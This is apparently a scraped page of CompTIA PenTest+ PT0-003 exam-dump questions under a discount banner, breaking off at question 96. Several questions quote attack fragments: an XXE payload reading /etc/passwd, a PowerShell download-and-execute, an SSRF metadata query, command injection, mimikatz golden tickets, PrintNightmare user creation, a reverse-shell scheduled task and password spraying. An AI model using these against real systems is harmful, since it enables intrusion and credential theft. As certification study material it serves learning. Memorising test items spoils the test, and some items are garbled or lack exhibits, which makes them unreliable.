Summer Certification Sale 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: save70

Free and Premium CompTIA PT0-003 Dumps Questions Answers

Page: 1 / 25
Total 336 questions

CompTIA PenTest+ Exam Questions and Answers

Question 1

During an assessment, a penetration tester plans to gather metadata from various online files, including pictures. Which of the following standards outlines the formats for pictures, audio, and additional tags that facilitate this type of reconnaissance?

Options:

A.

EXIF

B.

GIF

C.

COFF

D.

ELF

Buy Now
Question 2

A penetration tester finds that an application responds with the contents of the /etc/passwd file when the following payload is sent:

< ?xml version= " 1.0 " ? >

< !DOCTYPE data [ < !ENTITY foo SYSTEM " file:///etc/passwd " > ] >

< test > & foo; < /test >

Which of the following should the tester recommend in the report to best prevent this type of vulnerability?

Options:

A.

Drop all excessive file permissions with chmod o-rwx

B.

Ensure the requests application access logs are reviewed frequently

C.

Disable the use of external entities

D.

Implement a WAF to filter all incoming requests

Question 3

During an engagement, a penetration tester found some weaknesses that were common across the customer’s entire environment. The weaknesses included the following:

Weaker password settings than the company standard

Systems without the company ' s endpoint security software installed

Operating systems that were not updated by the patch management system

Which of the following recommendations should the penetration tester provide to address the root issue?

Options:

A.

Add all systems to the vulnerability management system.

B.

Implement a configuration management system.

C.

Deploy an endpoint detection and response system.

D.

Patch the out-of-date operating systems.

Question 4

During a penetration test, the tester identifies several unused services that are listening on all targeted internal laptops. Which of the following technical controls should the tester recommend to reduce the risk of compromise?

Options:

A.

Multifactor authentication

B.

Patch management

C.

System hardening

D.

Network segmentation

Question 5

A tester performs a vulnerability scan and identifies several outdated libraries used within the customer SaaS product offering. Which of the following types of scans did the tester use to identify the libraries?

Options:

A.

IAST

B.

SBOM

C.

DAST

D.

SAST

Question 6

A penetration tester needs to confirm the version number of a client ' s web application server. Which of the following techniques should the penetration tester use?

Options:

A.

SSL certificate inspection

B.

URL spidering

C.

Banner grabbing

D.

Directory brute forcing

Question 7

A penetration tester compromises a developer’s workstation and believes the individual may have access to Amazon cloud compute resources. Which of the following commands is least likely to trigger SOC detections to confirm access?

Options:

A.

aws sts get-caller-identity

B.

aws connect describe-user

C.

aws ec2 describe-instances --dry-run

D.

aws cloud9 list-environments --max-items 1

Question 8

A penetration tester would like to leverage a CSRF vulnerability to gather sensitive details from an application ' s end users. Which of the following tools should the tester use for this task?

Options:

A.

Browser Exploitation Framework

B.

Maltego

C.

Metasploit

D.

theHarvester

Question 9

A penetration tester is performing an authorized physical assessment. During the test, the tester observes an access control vestibule and on-site security guards near the entry door in the lobby. Which of the following is the best attack plan for the tester to use in order to gain access to the facility?

Options:

A.

Clone badge information in public areas of the facility to gain access to restricted areas.

B.

Tailgate into the facility during a very busy time to gain initial access.

C.

Pick the lock on the rear entrance to gain access to the facility and try to gain access.

D.

Drop USB devices with malware outside of the facility in order to gain access to internal machines.

Question 10

A penetration tester performs a service enumeration process and receives the following result after scanning a server using the Nmap tool:

PORT STATE SERVICE

22/tcp open ssh

25/tcp filtered smtp

111/tcp open rpcbind

2049/tcp open nfs

Based on the output, which of the following services provides the best target for launching an attack?

Options:

A.

Database

B.

Remote access

C.

Email

D.

File sharing

Question 11

During an assessment, a penetration tester obtains a low-privilege shell and then runs the following command:

findstr /SIM /C: " pass " *.txt *.cfg *.xml

Which of the following is the penetration tester trying to enumerate?

Options:

A.

Configuration files

B.

Permissions

C.

Virtual hosts

D.

Secrets

Question 12

A penetration tester is conducting an assessment of offline systems that control a power plant. The tester is looking for vulnerabilities observable in the network stack. The rules of engagement state that the tester cannot interact with production systems. Which of the following tools or techniques should the tester use for the assessment?

Options:

A.

Port mirroring

B.

Storyboarding

C.

Write blocker

D.

SAST tool

Question 13

A penetration tester needs to help create a threat model of a custom application. Which of the following is the most likely framework the tester will use?

Options:

A.

MITRE ATT & CK

B.

OSSTMM

C.

CI/CD

D.

DREAD

Question 14

A penetration tester writes a Bash script to automate the execution of a ping command on a Class C network:

for var in --MISSING TEXT-- do

ping -c 1 192.168.10.$var

done

Which of the following pieces of code should the penetration tester use in place of —MISSING TEXT—?

Options:

A.

crunch 1 254 loop

B.

seq 1 254

C.

echo 1-254

D.

fl..254

Question 15

A penetration tester wants to automatically enumerate all ciphers permitted on TLS/SSL configurations across a client’s internet-facing and internal web servers. Which of the following tools or frameworks best supports this objective?

Options:

A.

Nmap Scripting Engine

B.

Shodan

C.

Impacket

D.

Netcat

E.

Burp Suite

Question 16

You are a penetration tester reviewing a client’s website through a web browser.

INSTRUCTIONS

Review all components of the website through the browser to determine if vulnerabilities are present.

Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Question 17

A penetration tester needs to use the native binaries on a system in order to download a file from the internet and evade detection. Which of the following tools would the tester most likely use?

Options:

A.

netsh.exe

B.

certutil.exe

C.

nc.exe

D.

cmdkey.exe

Question 18

A penetration tester conducts OSINT for a client and discovers the robots.txt file explicitly blocks a major search engine. Which of the following would most likely help the penetration tester achieve the objective?

Options:

A.

Modifying the WAF

B.

Utilizing a CSRF attack

C.

Changing the robots.txt file

D.

Leveraging a competing provider

Question 19

A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use?

Options:

A.

powershell.exe impo C:\tools\foo.ps1

B.

certutil.exe -f https://192.168.0.1/foo.exe bad.exe

C.

powershell.exe -noni -encode IEX.Downloadstring( " http://172.16.0.1/ " )

D.

rundll32.exe c:\path\foo.dll,functName

Question 20

Which of the following is the most efficient way to exfiltrate a file containing data that could be sensitive?

Options:

A.

Use steganography and send the file over FTP.

B.

Compress the file and send it using TFTP.

C.

Split the file in tiny pieces and send it over dnscat.

D.

Encrypt and send the file over HTTPS.

Question 21

A penetration tester gains initial access to a target system by exploiting a recent RCE vulnerability. The patch for the vulnerability will be deployed at the end of the week. Which of the following utilities would allow the tester to reenter the system remotely after the patch has been deployed? (Select two).

Options:

A.

schtasks.exe

B.

rundll.exe

C.

cmd.exe

D.

chgusr.exe

E.

sc.exe

F.

netsh.exe

Question 22

During a discussion of a penetration test final report, the consultant shows the following payload used to attack a system:

html

Copy code

7/ < sCRitP > aLeRt( ' pwned ' ) < /ScriPt >

Based on the code, which of the following options represents the attack executed by the tester and the associated countermeasure?

Options:

A.

Arbitrary code execution: the affected computer should be placed on a perimeter network

B.

SQL injection attack: should be detected and prevented by a web application firewall

C.

Cross-site request forgery: should be detected and prevented by a firewall

D.

XSS obfuscated: should be prevented by input sanitization

Question 23

A penetration tester wants to verify whether passwords from a leaked password list can be used to access an SSH server as a legitimate user. Which of the following is the most appropriate tool for this task?

Options:

A.

BloodHound

B.

Responder

C.

Burp Suite

D.

Hydra

Question 24

A penetration tester has found a web application that is running on a cloud virtual machine instance. Vulnerability scans show a potential SSRF for the same application URL path with an injectable parameter. Which of the following commands should the tester run to successfully test for secrets exposure exploitability?

Options:

A.

curl < url > ?param=http://169.254.169.254/latest/meta-data/

B.

curl ' < url > ?param=http://127.0.0.1/etc/passwd '

C.

curl ' < url > ?param= < script > alert(1) < script > / '

D.

curl < url > ?param=http://127.0.0.1/

Question 25

A penetration tester creates the following Python script that can be used to enumerate information about email accounts on a target mail server:

Which of the following logic constructs would permit the script to continue despite failure?

Options:

A.

Add a do/while loop.

B.

Add an iterator.

C.

Add a t.ry/except. block.

D.

Add an if/else conditional.

Question 26

A penetration tester reviews scan output showing open services including FTP, SSH, SMTP, DNS, Kerberos, LDAP, HTTPS, SMB, RDP, and Squid proxy. The output also shows NetBIOS and DNS domain information. Which of the following most likely describes the function of this system?

Options:

A.

Enterprise mail server

B.

Honeypot

C.

Stand-alone web server

D.

Domain Controller

Question 27

A penetration tester identifies an exposed corporate directory containing first and last names and phone numbers for employees. Which of the following attack techniques would be the most effective to pursue if the penetration tester wants to compromise user accounts?

Options:

A.

Smishing

B.

Impersonation

C.

Tailgating

D.

Whaling

Question 28

A tester wants to pivot from a compromised host to another network with encryption and the least amount of interaction with the compromised host. Which of the following is the best way to accomplish this objective?

Options:

A.

Create an SSH tunnel using sshuttle to forward all the traffic to the compromised computer.

B.

Configure a VNC server on the target network and access the VNC server from the compromised computer.

C.

Set up a Metasploit listener on the compromised computer and create a reverse shell on the target network.

D.

Create a Netcat connection to the compromised computer and forward all the traffic to the target network.

Question 29

During an assessment on a client that uses virtual desktop infrastructure in the cloud, a penetration tester gains access to a host and runs commands. The penetration tester receives the following output:

-rw-r--r-- 1 comptiauser comptiauser 807 Apr 6 05:32 .profile

drwxr-xr-x 2 comptiauser comptiauser 4096 Apr 6 05:32 .ssh

-rw-r--r-- 1 comptiauser comptiauser 3526 Apr 6 05:32 .bashrc

drwxr-xr-x 4 comptiauser comptiauser 4096 May 12 11:05 .aws

-rw-r--r-- 1 comptiauser comptiauser 1325 Aug 21 19:54 .zsh_history

drwxr-xr-x 12 comptiauser comptiauser 4096 Aug 27 14:10 Documents

drwxr-xr-x 16 comptiauser comptiauser 4096 Aug 27 14:10 Desktop

drwxr-xr-x 2 comptiauser comptiauser 4096 Aug 27 14:10 Downloads

Which of the following should the penetration tester investigate first?

Options:

A.

Documents

B.

.zsh_history

C.

.aws

D.

.ssh

Question 30

A penetration tester needs to test a very large number of URLs for public access. Given the following code snippet:

1 import requests

2 import pathlib

3

4 for url in pathlib.Path( " urls.txt " ).read_text().split( " \n " ):

5 response = requests.get(url)

6 if response.status == 401:

7 print( " URL accessible " )

Which of the following changes is required?

Options:

A.

The condition on line 6

B.

The method on line 5

C.

The import on line 1

D.

The delimiter in line 3

Question 31

A company hires a penetration tester to test the security implementation of its wireless networks. The main goal for this assessment is to intercept and get access to sensitive data from the company ' s employees. Which of the following tools should the security professional use to best accomplish this task?

Options:

A.

Metasploit

B.

WiFi-Pumpkin

C.

SET

D.

theHarvester

E.

WiGLE.net

Question 32

A penetration tester creates a list of target domains that require further enumeration. The tester writes the following script to perform vulnerability scanning across the domains:

line 1: #!/usr/bin/bash

line 2: DOMAINS_LIST = " /path/to/list.txt "

line 3: while read -r i; do

line 4: nikto -h $i -o scan-$i.txt &

line 5: done

The script does not work as intended. Which of the following should the tester do to fix the script?

Options:

A.

Change line 2 to { " domain1 " , " domain2 " , " domain3 " , }.

B.

Change line 3 to while true; read -r i; do.

C.

Change line 4 to nikto $i | tee scan-$i.txt.

D.

Change line 5 to done < " $DOMAINS_LIST " .

Question 33

A penetration tester is researching a path to escalate privileges. While enumerating current user privileges, the tester observes the following:

SeAssignPrimaryTokenPrivilege Disabled

SeIncreaseQuotaPrivilege Disabled

SeChangeNotifyPrivilege Enabled

SeManageVolumePrivilege Enabled

SeImpersonatePrivilege Enabled

SeCreateGlobalPrivilege Enabled

SeIncreaseWorkingSetPrivilege Disabled

Which of the following privileges should the tester use to achieve the goal?

Options:

A.

SeImpersonatePrivilege

B.

SeCreateGlobalPrivilege

C.

SeChangeNotifyPrivilege

D.

SeManageVolumePrivilege

Question 34

After exploiting a vulnerability in an insecure service to gain access to a Linux system, a penetration tester executes the following commands:

sudo -l

route

netstat -a

last

who

Which of the following best describes the tester’s purpose for running these commands?

Options:

A.

To obtain information about other systems in the network

B.

To enumerate users and services in order to identify additional targets

C.

To prepare for establishing persistence on the system

D.

To gather data to prepare for lateral movement

Question 35

A penetration tester compromises a Windows OS endpoint that is joined to an Active Directory local environment. Which of the following tools should the tester use to manipulate authentication mechanisms to move laterally in the network?

Options:

A.

Rubeus

B.

WinPEAS

C.

NTLMRelayX

D.

Impacket

Question 36

During an assessment, a penetration tester runs the following command from a Linux machine:

GetUsersSPNs.py -dc-ip 172.16.1.1 DOMAIN.LOCAL/aholliday -request

Which of the following is the penetration tester trying to do?

Options:

A.

Crack the user password for aholliday

B.

Download all TGS tickets for offline processing

C.

Perform a pass-the-hash attack using the hash for aholliday

D.

Perform password spraying

Question 37

A penetration testing team wants to conduct DNS lookups for a set of targets provided by the client. The team crafts a Bash script for this task. However, they find a minor error in one line of the script:

1 #!/bin/bash

2 for i in $(cat example.txt); do

3 curl $i

4 done

Which of the following changes should the team make to line 3 of the script?

Options:

A.

resolvconf $i

B.

rndc $i

C.

systemd-resolve $i

D.

host $i

Question 38

During a security audit, a penetration tester wants to run a process to gather information about a target network ' s domain structure and associated IP addresses. Which of the following tools should the tester use?

Options:

A.

Dnsenum

B.

Nmap

C.

Netcat

D.

Wireshark

Question 39

A tester obtains access to an endpoint subnet and wants to move laterally in the network. Given the following output:

kotlin

Copy code

Nmap scan report for some_host

Host is up (0.01 latency).

PORT STATE SERVICE

445/tcp open microsoft-ds

Host script results: smb2-security-mode: Message signing disabled

Which of the following command and attack methods is the most appropriate for reducing the chances of being detected?

Options:

A.

responder -T eth0 -dwv ntlmrelayx.py -smb2support -tf < target >

B.

msf > use exploit/windows/smb/ms17_010_psexec msf > < set options > msf > run

C.

hydra -L administrator -P /path/to/passwdlist smb:// < target >

D.

nmap —script smb-brute.nse -p 445 < target >

Question 40

During a testing engagement, a penetration tester compromises a host and locates data for exfiltration. Which of the following are the best options to move the data without triggering a data loss prevention tool? (Select two).

Options:

A.

Move the data using a USB flash drive.

B.

Compress and encrypt the data.

C.

Rename the file name extensions.

D.

Use FTP for exfiltration.

E.

Encode the data as Base64.

F.

Send the data to a commonly trusted service.

Question 41

While performing reconnaissance, a penetration tester attempts to identify publicly accessible ICS (Industrial Control Systems) and IoT (Internet of Things) systems. Which of the following tools is most effective for this task?

Options:

A.

theHarvester

B.

Shodan

C.

Amass

D.

Nmap

Question 42

Which of the following components should a penetration tester include in the final assessment report?

Options:

A.

User activities

B.

Customer remediation plan

C.

Key management

D.

Attack narrative

Question 43

You are a penetration tester running port scans on a server.

INSTRUCTIONS

Part 1: Given the output, construct the command that was used to generate this output from the available options.

Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Question 44

A penetration tester presents the following findings to stakeholders:

Control | Number of findings | Risk | Notes

Encryption | 1 | Low | Weak algorithm noted

Patching | 8 | Medium | Unsupported systems

System hardening | 2 | Low | Baseline drift observed

Secure SDLC | 10 | High | Libraries have vulnerabilities

Password policy | 0 | Low | No exceptions noted

Based on the findings, which of the following recommendations should the tester make? (Select two).

Options:

A.

Develop a secure encryption algorithm.

B.

Deploy an asset management system.

C.

Write an SDLC policy.

D.

Implement an SCA tool.

E.

Obtain the latest library version.

F.

Patch the libraries.

Question 45

A penetration tester obtains local administrator access on a Windows system and wants to attempt lateral movement. The system exists within a Windows Workgroup environment. Which of the following actions should the tester take?

Options:

A.

Create a malicious certificate.

B.

Dump credentials from memory.

C.

Craft Kerberos tickets.

D.

List potential privilege escalation paths.

Question 46

During a vulnerability assessment, a penetration tester configures the scanner sensor and performs the initial vulnerability scanning under the client ' s internal network. The tester later discusses the results with the client, but the client does not accept the results. The client indicates the host and assets that were within scope are not included in the vulnerability scan results. Which of the following should the tester have done?

Options:

A.

Rechecked the scanner configuration.

B.

Performed a discovery scan.

C.

Used a different scan engine.

D.

Configured all the TCP ports on the scan.

Question 47

As part of a security audit, a penetration tester finds an internal application that accepts unexpected user inputs, leading to the execution of arbitrary commands. Which of the following techniques would the penetration tester most likely use to access the sensitive data?

Options:

A.

Logic bomb

B.

SQL injection

C.

Brute-force attack

D.

Cross-site scripting

Question 48

While performing a penetration test, a tester executes the following command:

PS c:\tools > c:\hacks\PsExec.exe \\server01.cor.ptia.org -accepteula cmd.exe

Which of the following best explains what the tester is trying to do?

Options:

A.

Test connectivity using PsExec on the server01 using cmd.exe

B.

Perform a lateral movement attack using PsExec

C.

Send the PsExec binary file to the server01 using cmd.exe

D.

Enable cmd.exe on the server01 through PsExec

Question 49

Which of the following is a reason to use a template when creating a penetration testing report?

Options:

A.

To articulate risks accurately

B.

To enhance the testing approach

C.

To contextualize collected data

D.

To standardize needed information

E.

To improve testing time

Question 50

Which of the following activities should be performed to prevent uploaded web shells from being exploited by others?

Options:

A.

Removing persistence mechanisms

B.

Uninstalling tools

C.

Preserving artifacts

D.

Reverting configuration changes

Question 51

A penetration tester needs to collect information over the network for further steps in an internal assessment. Which of the following would most likely accomplish this goal?

Options:

A.

ntlmrelayx.py -t 192.168.1.0/24 -1 1234

B.

nc -tulpn 1234 192.168.1.2

C.

responder.py -I eth0 -wP

D.

crackmapexec smb 192.168.1.0/24

Question 52

A tester conducts a web application penetration test and discovers a hidden diagnostics page. The hidden diagnostics page allows a user to ping other systems and test connectivity. Which of the following payloads is best suited to test this function?

Options:

A.

; whoami ; ps aux

B.

< script > alert(1) < /script >

C.

' SELECT @@version --

D.

../../../../../../etc/passwd

Question 53

A penetration tester cannot find information on the target company ' s systems using common OSINT methods. The tester ' s attempts to do reconnaissance against internet-facing resources have been blocked by the company ' s WAF. Which of the following is the best way to avoid the WAF and gather information about the target company ' s systems?

Options:

A.

HTML scraping

B.

Code repository scanning

C.

Directory enumeration

D.

Port scanning

Question 54

A penetration tester assesses a complex web application and wants to explore potential security weaknesses by searching for subdomains that might have existed in the past. Which of the following tools should the penetration tester use?

Options:

A.

Censys.io

B.

Shodan

C.

Wayback Machine

D.

SpiderFoot

Question 55

During an assessment, a penetration tester runs the following command:

setspn.exe -Q /

Which of the following attacks is the penetration tester preparing for?

Options:

A.

LDAP injection

B.

Pass-the-hash

C.

Kerberoasting

D.

Dictionary

Question 56

A penetration tester reviews a SAST vulnerability scan report. The following lines of code have been reported as vulnerable:

Issue 40 of 126

Language: Java

Severity: Medium

Call:

try {

// ...

} catch (SomeException e) {

e.printStackTrace();

}

Which of the following is the best method to remediate this vulnerability?

Options:

A.

Implementing a logging framework

B.

Removing the five code lines reported with issues

C.

Initiating a secure coding-awareness program with all the developers

D.

Documenting the vulnerability as a false positive

Question 57

A penetration tester conducts reconnaissance for a client ' s network and identifies the following system of interest:

$ nmap -A AppServer1.compita.org

Starting Nmap 7.80 (2023-01-14) on localhost (127.0.0.1) at 2023-08-04 15:32:27

Nmap scan report for AppServer1.compita.org (192.168.1.100)

Host is up (0.001s latency).

Not shown: 999 closed ports

Port State Service

21/tcp open ftp

22/tcp open ssh

23/tcp open telnet

80/tcp open http

135/tcp open msrpc

139/tcp open netbios-ssn

443/tcp open https

445/tcp open microsoft-ds

873/tcp open rsync

8080/tcp open http-proxy

8443/tcp open https-alt

9090/tcp open zeus-admin

10000/tcp open snet-sensor-mgmt

The tester notices numerous open ports on the system of interest. Which of the following best describes this system?

Options:

A.

A honeypot

B.

A Windows endpoint

C.

A Linux server

D.

An already-compromised system

Question 58

Which of the following components of a penetration test report most directly contributes to prioritizing remediations?

Options:

A.

Proof of concept

B.

Risk scoring

C.

Attack narrative

D.

Executive summary

Question 59

A penetration tester successfully clones a source code repository and then runs the following command:

find . -type f -exec egrep -i " token|key|login " {} \;

Which of the following is the penetration tester conducting?

Options:

A.

Data tokenization

B.

Secrets scanning

C.

Password spraying

D.

Source code analysis

Question 60

A client recently hired a penetration testing firm to conduct an assessment of their consumer-facing web application. Several days into the assessment, the client’s networking team observes a substantial increase in DNS traffic. Which of the following would most likely explain the increase in DNS traffic?

Options:

A.

Covert data exfiltration

B.

URL spidering

C.

HTML scraping

D.

DoS attack

Question 61

Which of the following scenarios would most likely lead a client to reprioritize goals after a penetration test begins?

Options:

A.

An end-of-life web server is decommissioned.

B.

A new zero-day vulnerability is publicly disclosed.

C.

The penetration tester is not capturing artifacts for an exploited vulnerability.

D.

A new lead penetration tester is assigned to the project.

Question 62

A penetration tester must identify vulnerabilities within an ICS (Industrial Control System) that is not connected to the internet or enterprise network. Which of the following should the tester utilize to conduct the testing?

Options:

A.

Channel scanning

B.

Stealth scans

C.

Source code analysis

D.

Manual assessment

Question 63

During a security assessment, a penetration tester captures plaintext login credentials on the communication between a user and an authentication system. The tester wants to use this information for further unauthorized access.

Which of the following tools is the tester using?

Options:

A.

Burp Suite

B.

Wireshark

C.

Zed Attack Proxy (ZAP)

D.

Metasploit

Question 64

A penetration tester is developing the rules of engagement for a potential client. Which of the following would most likely be a function of the rules of engagement?

Options:

A.

Testing window

B.

Terms of service

C.

Authorization letter

D.

Shared responsibilities

Question 65

A penetration tester aims to exploit a vulnerability in a wireless network that lacks proper encryption. The lack of proper encryption allows malicious content to infiltrate the network. Which of the following techniques would most likely achieve the goal?

Options:

A.

Packet injection

B.

Bluejacking

C.

Beacon flooding

D.

Signal jamming

Question 66

During a penetration testing exercise, a team decides to use a watering hole strategy. Which of the following is the most effective approach for executing this attack?

Options:

A.

Compromise a website frequently visited by the organization ' s employees.

B.

Launch a DDoS attack on the organization ' s website.

C.

Create fake social media profiles to befriend employees.

D.

Send phishing emails to the organization ' s employees.

Question 67

During an assessment of a company, a penetration tester sends the following email to the company’s Chief Financial Officer (CFO):

Dear CFO,

As we talked about during a recent meeting, please open the following attachment that contains the invoice for an existing vendor. If you do not pay this now, we will suspend the licenses for your billing system in three days.

GoPay CMS Systems Services

Which of the following techniques is this attack an example of?

Options:

A.

Whaling

B.

Phishing

C.

Spear phishing

D.

Vishing

Question 68

During a penetration test, the tester uses a vulnerability scanner to collect information about any possible vulnerabilities that could be used to compromise the network. The tester receives the results and then executes the following command:

snmpwalk -v 2c -c public 192.168.1.23

Which of the following is the tester trying to do based on the command they used?

Options:

A.

Bypass defensive systems to collect more information.

B.

Use an automation tool to perform the attacks.

C.

Script exploits to gain access to the systems and host.

D.

Validate the results and remove false positives.

Question 69

A penetration tester is conducting a vulnerability scan. The tester wants to see any vulnerabilities that may be visible from outside of the organization. Which of the following scans should the penetration tester perform?

Options:

A.

SAST

B.

Sidecar

C.

Unauthenticated

D.

Host-based

Question 70

A penetration tester is performing reconnaissance for a web application assessment. Upon investigation, the tester reviews the robots.txt file for items of interest.

INSTRUCTIONS

Select the tool the penetration tester should use for further investigation.

Select the two entries in the robots.txt file that the penetration tester should recommend for removal.

Options:

Question 71

A penetration tester gained a foothold within a network. The penetration tester needs to enumerate all users within the domain. Which of the following is the best way to accomplish this task?

Options:

A.

pwd.exe

B.

net.exe

C.

sc.exe

D.

msconfig.exe

Question 72

A tester needs to begin capturing WLAN credentials for cracking during an on-site engagement. Which of the following is the best command to capture handshakes?

Options:

A.

tcpdump -n -s0 -w < pcapname > -i < iface >

B.

airserv-ng -d < iface >

C.

aireplay-ng -0 1000 -a < target_mac >

D.

airodump-ng -c 6 --bssid < target_mac > < iface >

Question 73

A penetration tester is evaluating a company ' s cybersecurity preparedness. The tester wants to acquire valid credentials using a social engineering campaign. Which of the following tools and techniques are most applicable in this scenario? (Select two).

Options:

A.

TruffleHog for collecting credentials

B.

Shodan for identifying potential targets

C.

Gophish for sending phishing emails

D.

Maltego for organizing targets

E.

theHarvester for discovering additional targets

F.

Evilginx for handling legitimate authentication requests through a proxy

Question 74

During an assessment, a penetration tester manages to get RDP access via a low-privilege user. The tester attempts to escalate privileges by running the following commands:

Import-Module .\PrintNightmare.ps1

Invoke-Nightmare -NewUser " hacker " -NewPassword " Password123! " -DriverName " Print "

The tester attempts to further enumerate the host with the new administrative privileges by using the runas command. However, the access level is still low. Which of the following actions should the penetration tester take next?

Options:

A.

Log off and log on with " hacker " .

B.

Attempt to add another user.

C.

Bypass the execution policy.

D.

Add a malicious printer driver.

Question 75

A penetration tester discovers data to stage and exfiltrate. The client has authorized movement to the tester ' s attacking hosts only. Which of the following would be most appropriate to avoid alerting the SOC?

Options:

A.

Apply UTF-8 to the data and send over a tunnel to TCP port 25.

B.

Apply Base64 to the data and send over a tunnel to TCP port 80.

C.

Apply 3DES to the data and send over a tunnel UDP port 53.

D.

Apply AES-256 to the data and send over a tunnel to TCP port 443.

Question 76

During an internal penetration test, the tester uses the following command:

C:\ Invoke-mimikatz.ps1 " kerberos::golden /domain:test.local /sid:S-1-5-21-3234... /target: dc01.test.local /service:CIFS /RC4:237749d82... /user:support.test.local /ptt "

Which of the following best describes the tester’s goal when executing this command?

Options:

A.

Bypassing normal authentication

B.

Enumerating shares

C.

Obtaining current user credentials

D.

Using password spraying

Question 77

During an external penetration test, a tester receives the following output from a tool:

test.comptia.org

info.comptia.org

vpn.comptia.org

exam.comptia.org

Which of the following commands did the tester most likely run to get these results?

Options:

A.

nslookup -type=SOA comptia.org

B.

amass enum -passive -d comptia.org

C.

nmap -Pn -sV -vv -A comptia.org

D.

shodan host comptia.org

Question 78

A penetration tester would like to collect permission details for objects within the domain. The tester has a valid AD user and access to an internal PC. Which of the following sets of steps is the best way for the tester to accomplish the desired outcome?

Options:

A.

Escalate privileges.Execute Rubeus.Run a Cypher query on Rubeus to get the results.

B.

Run SharpHound.Install CrackMapExec.Perform a CrackMapExec database query on CME to get the results.

C.

Run SharpHoundInstall BloodHoundPerform a Cypher query on BloodHound to get the results.

D.

Escalate privileges.Get Windows Registry data.Perform a query to get results.

Question 79

A penetration tester is evaluating the security of a corporate client’s web application using federated access. Which of the following approaches has the least possibility of blocking the IP address of the tester’s machine?

Options:

A.

for user in $(cat users.txt); dofor pass in $(cat /usr/share/wordlists/rockyou.txt); docurl -sq -XPOST https://example.com/login.asp -d " username=$user & password=$pass " | grep " Welcome " & & echo " OK: $user $pass " done; done

B.

spray365.py generate --password_file passwords.txt --user_file users.txt --domain example.com --delay 1 --execution_plan target.planspray365.py spray target.plan

C.

import requests,pathlibusers=pathlib.Path( " users.txt " ).read_text(); passwords=pathlib.Path( " passwords.txt " ).read_text()for user in user:for pass in passwords:r=requests.post( " https://example.com " ,data=f " username={user} & password={pass} " ,headers={ " user-agent " : " Mozilla/5.0 " })if " Welcome " in r.text:print(f " OK: {user} {pass} " )

D.

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt < domain_ip > http-post-form " /login.asp:username=^USER^ & password=^PASS^:Invalid Password "

Question 80

A penetration tester successfully gains access to a Linux system and then uses the following command:

find / -type f -ls > /tmp/recon.txt

Which of the following best describes the tester’s goal?

Options:

A.

Permission enumeration

B.

Secrets enumeration

C.

User enumeration

D.

Service enumeration

Question 81

A penetration tester needs to obtain sensitive data from several executives who regularly work while commuting by train. Which of the following methods should the tester use for this task?

Options:

A.

Shoulder surfing

B.

Credential harvesting

C.

Bluetooth spamming

D.

MFA fatigue

Question 82

A penetration tester needs to evaluate the order in which the next systems will be selected for testing. Given the following output:

Which of the following targets should the tester select next?

Options:

A.

fileserver

B.

hrdatabase

C.

legaldatabase

D.

financesite

Question 83

During an assessment, a penetration tester obtains an NTLM hash from a legacy Windows machine. Which of the following tools should the penetration tester use to continue the attack?

Options:

A.

Responder

B.

Hydra

C.

BloodHound

D.

CrackMapExec

Question 84

A penetration tester has been provided with only the public domain name and must enumerate additional information for the public-facing assets.

INSTRUCTIONS

Select the appropriate answer(s), given the output from each section.

Output 1

Options:

Question 85

A Chief Information Security Officer wants to automate adversarial activities from penetration tests that are relevant to the organization. Which of the following should a penetration tester do first to accomplish this task?

Options:

A.

Deploy a command-and-control server with custom profiles to facilitate execution.

B.

Use Python 3 with added testing libraries and script the relevant action to test.

C.

Utilize the PowerShell PowerView tool with custom scripting additions based on test results.

D.

Implement Atomic Red Team to chain critical TTPs and perform the test.

Question 86

Which of the following best describes the importance of including the attack steps in a penetration test report?

Options:

A.

It easily provides the recommended mitigations.

B.

It ensures results can be independently verified.

C.

It proves the penetration tester’s competency to the customer.

D.

It demonstrates the difficulty of exploiting specific vulnerabilities in the kill chain.

Question 87

A penetration tester is attempting to exfiltrate sensitive data from a client environment without alerting the client ' s blue team. Which of the following exfiltration methods most likely remain undetected?

Options:

A.

Cloud storage

B.

Email

C.

Domain Name System

D.

Test storage sites

Question 88

A penetration tester needs to launch an Nmap scan to find the state of the port for both TCP and UDP services. Which of the following commands should the tester use?

Options:

A.

nmap -sU -sW -p 1-65535 example.com

B.

nmap -sU -sY -p 1-65535 example.com

C.

nmap -sU -sT -p 1-65535 example.com

D.

nmap -sU -sN -p 1-65535 example.com

Question 89

During an assessment, a penetration tester gains access to one of the internal hosts. Given the following command:

schtasks /create /sc onlogon /tn " Windows Update " /tr " cmd.exe /c reverse_shell.exe "

Which of the following is the penetration tester trying to do with this code?

Options:

A.

Enumerate the scheduled tasks

B.

Establish persistence

C.

Deactivate the Windows Update functionality

D.

Create a binary application for Windows System Updates

Question 90

A penetration tester successfully gains access to a Linux system and then uses the following command:

find / -type f -ls > /tmp/recon.txt

Which of the following best describes the tester ' s goal?

Options:

A.

Permission enumeration

B.

Secrets enumeration

C.

User enumeration

D.

Service enumeration

Question 91

A penetration tester gains access to the target network and observes a running SSH server.

Which of the following techniques should the tester use to obtain the version of SSH running on the target server?

Options:

A.

Network sniffing

B.

IP scanning

C.

Banner grabbing

D.

DNS enumeration

Question 92

A penetration tester gains access to a domain server and wants to enumerate the systems within the domain. Which of the following tools would provide the best oversight of domains?

Options:

A.

Netcat

B.

Wireshark

C.

Nmap

D.

Responder

Question 93

In a file stored in an unprotected source code repository, a penetration tester discovers the following line of code:

sshpass -p donotchange ssh admin@192.168.6.14

Which of the following should the tester attempt to do next to take advantage of this information? (Select two).

Options:

A.

Use Nmap to identify all the SSH systems active on the network.

B.

Take a screen capture of the source code repository for documentation purposes.

C.

Investigate to find whether other files containing embedded passwords are in the code repository.

D.

Confirm whether the server 192.168.6.14 is up by sending ICMP probes.

E.

Run a password-spraying attack with Hydra against all the SSH servers.

F.

Use an external exploit through Metasploit to compromise host 192.168.6.14.

Question 94

A penetration tester is performing a security review of a web application. Which of the following should the tester leverage to identify the presence of vulnerable open-source libraries?

Options:

A.

VM

B.

IAST

C.

DAST

D.

SCA

Question 95

During a penetration test, a tester attempts to pivot from one Windows 10 system to another Windows system. The penetration tester thinks a local firewall is blocking connections. Which of the following command-line utilities built into Windows is most likely to disable the firewall?

Options:

A.

certutil.exe

B.

bitsadmin.exe

C.

msconfig.exe

D.

netsh.exe

Question 96

